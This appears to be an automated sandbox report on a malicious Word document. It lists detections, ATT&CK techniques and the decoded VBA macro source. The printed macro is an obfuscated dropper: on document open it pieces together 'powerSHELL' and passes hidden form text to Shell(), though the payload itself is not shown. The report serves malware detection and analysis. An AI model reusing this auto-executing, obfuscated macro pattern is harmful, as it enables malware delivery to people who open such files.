Verdict: MALICIOUS
Risk Score: 222
Malware Insights
MITRE ATT&CK:
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1203 Exploitation for Client Execution
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing VBA macros. The 'Document_Open' macro triggers a call to a function that constructs and executes a shell command. This command is likely intended to download and execute a second-stage payload, as indicated by the ClamAV detection name 'Doc.Dropper.Agent-6852152-0'. The use of the Shell() function and the auto-execution of the macro strongly suggest a dropper or downloader functionality.
Heuristics (6)
- ClamAV: Doc.Dropper.Agent-6852152-0 | severity: critical | CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Dropper.Agent-6852152-0
- VBA macros detected | severity: medium | 3 related findings | OLE_VBA_MACROS: Document contains VBA macro code
- Shell() call in VBA | severity: critical | OLE_VBA_SHELL: Shell() call in VBA
- Document_Open macro | severity: high | OLE_VBA_DOCOPEN: Document_Open macro
- VBA p-code auto-exec with execution tokens | severity: high | OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL | severity: info | EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1950 bytes |

SHA-256: 2f9cb5334a2202a2a995f3a06dd3b20ef094be75dec14b0814d1d360d5b503e8
Preview script: first 1,000 lines of the extracted script

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Document_Open()
Call w("er")
End Sub
Attribute VB_Name = "JT2x0bNu"
Sub w(ruw1tx4y)
Dim mG8Nt(10 To 121) As String
mG8Nt(10) = "QVr03P6h"
Dim oupih As Long
oupih = (12288 / 1536) + (28)
Dim TOLxgdl
TOLxgdl = j1hW57mD4
Dim x8CNeM(7 To 92) As String
x8CNeM(7) = "HzQrZdhH0"
r1dac = "SHE" & "LL "
ygRNIuAdo = "ow"
NWG80q = ruw1tx4y
Dim t2Isgp As Long
t2Isgp = (384 - 363) / (22)
zKRdM sYkPMlG() & ygRNIuAdo & NWG80q & r1dac & yLmS2o3G
Dim KcApJbP As Long
KcApJbP = (626 - 595) * (23)
Dim DuLdP(11 To 51) As Long
DuLdP(11) = 15141 / 103
End Sub
Attribute VB_Name = "RVvRAQe"
Public Function sYkPMlG() As String
Dim ocRAqIuLg(8 To 43) As Long
ocRAqIuLg(8) = 312 - 94
Dim Uf4B5Ph As String
Uf4B5Ph = YYXu2WO
Dim VkbZQq59e(4 To 185) As Long
VkbZQq59e(4) = 22244 / 134
Dim h6HKLC8
h6HKLC8 = kw59QjS
sYkPMlG = "p"
End Function
Function zKRdM(I2AyFSCE1)
zKRdM = Shell(I2AyFSCE1, False)
End Function
Attribute VB_Name = "z2ztwniJ"
Public Function yLmS2o3G()
Dim X4eHgxGY
X4eHgxGY = BtzoM
Dim Twg1DJ As Object
Set Twg1DJ = New f
Dim FX3aDN7 As Long
FX3aDN7 = (-8753 + 8755) / (5)
Dim sEeMvsn(14 To 119) As String
sEeMvsn(14) = "RbpyZlUhm"
Dim H2v8Q93 As String
Dim mZK63h4df As Long
mZK63h4df = (28913 / 997) - (29)
H2v8Q93 = Twg1DJ.de.Text
yLmS2o3G = H2v8Q93
End Function
Attribute VB_Name = "f"
Attribute VB_Base = "0{A202624F-43DB-4B3D-A28F-BF7D9DA50FC8}{D0AAFBD5-A020-43C7-A35E-3757D62CC4CF}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
```